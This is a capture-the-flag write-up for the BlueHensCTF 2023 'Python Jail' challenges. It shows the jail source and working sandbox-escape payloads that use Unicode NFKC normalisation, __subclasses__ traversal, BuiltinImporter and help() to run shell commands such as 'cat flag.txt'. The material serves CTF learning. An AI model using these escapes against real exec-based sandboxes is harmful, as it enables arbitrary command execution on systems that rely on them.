Published on

BlueHensCTF 2023 – Python Jail / Harder

Authors
  • avatar
    Name
    Lumy
    Twitter

Python Jail / Harder

No ASCII letters are allowed. Remote is running Python 3.10.12 (main, Jun 11 2023, 05:26:28) [GCC 11.4.0] Messed up my first version of python jail.

Table of Contents

  1. Source
  2. Python Jail
  3. Python Jail Harder

Source

Python Jail :

  • Source code :
#!/usr/bin/env python

blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

security_check = lambda s: any(c in blacklist for c in s) and s.count('_') < 50

def main():
    while True:
        cmds = input("> ")
        if security_check(cmds):
            print("nope.")
        else:
            exec(cmds, {'__builtins__': None}, {})


if __name__ == "__main__":
    main()

Python Jail Harder:

  • Source code :
#!/usr/bin/env python

blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

security_check = lambda s: any(c in blacklist for c in s) or s.count('_') > 50

def main():
    while True:
        cmds = input("> ")
        if security_check(cmds):
            print("nope.")
        else:
            exec(cmds, {'__builtins__': None}, {})


if __name__ == "__main__":
    main()

PyJail

"# _____________________" this allows you to bypass the check function

[c for c in {}.__class__.__base__.__subclasses__() if "BuiltinImporter" == c.__name__][0].load_module('os').system('cat flag.txt') # __________________________________________________

Flag : UDCTF{pyth0n_NFKC_t0_byp4ss_f1l1t3r}

Pyjail_Harder

For the latest jail, I searched for writeups on the internet. And, I found this script interesting :

in_ = "print(open(chr(102)+chr(108)+chr(97)+chr(103),chr(114)),chr(114)+chr(101)+chr(97)+chr(100))())"
in_="exec(input())"
def map_char(c):
    if not c in ".'()'0123456789,:+":
        return chr(ord(c) - ord('a') + 0x1D41A)
    elif c=='.':
        return ' ̣'
    else:
        return c

s = ''.join([map_char(c) for c in in_])
print(s)

Final Payload :

𝐳=()<();𝐨=𝐳**𝐳;𝐭=𝐨+𝐨;𝐢𝐧𝐝𝐞𝐱=(((((𝐭+𝐨)*𝐭)*𝐭+𝐨)*𝐭)*𝐭)*𝐭;𝐨𝐬=''.𝐞𝐧𝐜𝐨𝐝𝐞().__𝐜𝐥𝐚𝐬𝐬__([(((((𝐭+𝐨)*𝐭)*𝐭+𝐨)*𝐭+𝐨)*𝐭+𝐨)*𝐭+𝐨,(((((𝐭+𝐨)*𝐭+𝐨)*𝐭)*𝐭)*𝐭+𝐨)*𝐭+𝐨,]).𝐝𝐞𝐜𝐨𝐝𝐞();𝐜𝐨𝐦𝐦𝐚𝐧𝐝=''.𝐞𝐧𝐜𝐨𝐝𝐞().__𝐜𝐥𝐚𝐬𝐬__([(((((𝐭+𝐨)*𝐭)*𝐭)*𝐭)*𝐭+𝐨)*𝐭+𝐨,(((((𝐭+𝐨)*𝐭)*𝐭)*𝐭)*𝐭)*𝐭+𝐨,(((((𝐭+𝐨)*𝐭+𝐨)*𝐭)*𝐭+𝐨)*𝐭)*𝐭,((((𝐭)*𝐭)*𝐭)*𝐭)*𝐭,(((((𝐭+𝐨)*𝐭)*𝐭)*𝐭+𝐨)*𝐭+𝐨)*𝐭,(((((𝐭+𝐨)*𝐭)*𝐭+𝐨)*𝐭+𝐨)*𝐭)*𝐭,(((((𝐭+𝐨)*𝐭)*𝐭)*𝐭)*𝐭)*𝐭+𝐨,(((((𝐭+𝐨)*𝐭)*𝐭)*𝐭+𝐨)*𝐭+𝐨)*𝐭+𝐨,((((𝐭)*𝐭+𝐨)*𝐭+𝐨)*𝐭+𝐨)*𝐭,(((((𝐭+𝐨)*𝐭+𝐨)*𝐭)*𝐭+𝐨)*𝐭)*𝐭,(((((𝐭+𝐨)*𝐭+𝐨)*𝐭+𝐨)*𝐭)*𝐭)*𝐭,(((((𝐭+𝐨)*𝐭+𝐨)*𝐭)*𝐭+𝐨)*𝐭)*𝐭,]).𝐝𝐞𝐜𝐨𝐝𝐞();{}.__𝐜𝐥𝐚𝐬𝐬__.__𝐛𝐚𝐬𝐞__.__𝐬𝐮𝐛𝐜𝐥𝐚𝐬𝐬𝐞𝐬__()[𝐢𝐧𝐝𝐞𝐱].𝐥𝐨𝐚𝐝_𝐦𝐨𝐝𝐮𝐥𝐞(𝐨𝐬).𝐬𝐲𝐬𝐭𝐞𝐦(𝐜𝐨𝐦𝐦𝐚𝐧𝐝)

You can also just invoke help from _sitebuiltins._Helper This payload works for the 2 jails :

().__𝓬𝓵𝓪𝓼𝓼__.__𝓫𝓪𝓼𝓮__.__𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼__()[~(()==())]()()
os
!!!!!!!!cat flag.txt

Flag : UDCTF{aaaaaa_r3try_NFKC_byp4ss_att3mpt_2}